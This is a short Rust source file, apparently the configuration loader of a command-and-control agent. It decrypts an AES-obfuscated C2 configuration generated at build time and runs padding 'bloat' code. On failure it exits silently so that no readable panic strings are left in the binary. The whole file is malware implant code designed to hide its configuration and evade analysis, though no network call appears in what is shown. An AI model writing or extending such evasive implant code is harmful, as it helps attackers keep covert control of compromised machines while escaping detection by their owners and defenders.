// ./src/agent/config.rs
use crate::common::C2Config;

// This file is generated by build.rs and contains the
// AES Key, Nonce, Ciphertext arrays and the decrypt function.
include!(concat!(env!("OUT_DIR"), "/obfuscated_config.rs"));
include!(concat!(env!("OUT_DIR"), "/bloat_data.rs"));

pub fn load() -> C2Config {
    // 1. Run Bloat
    use_bloat();

    // 2. Decrypt Config using generated get_config()
    let bytes = get_config();

    // 3. Unpack the binary config - silent exit on failure (no readable
    // panic string in binary)
    let config = C2Config::unpack(&bytes).unwrap_or_else(|| std::process::exit(1));

    config
}
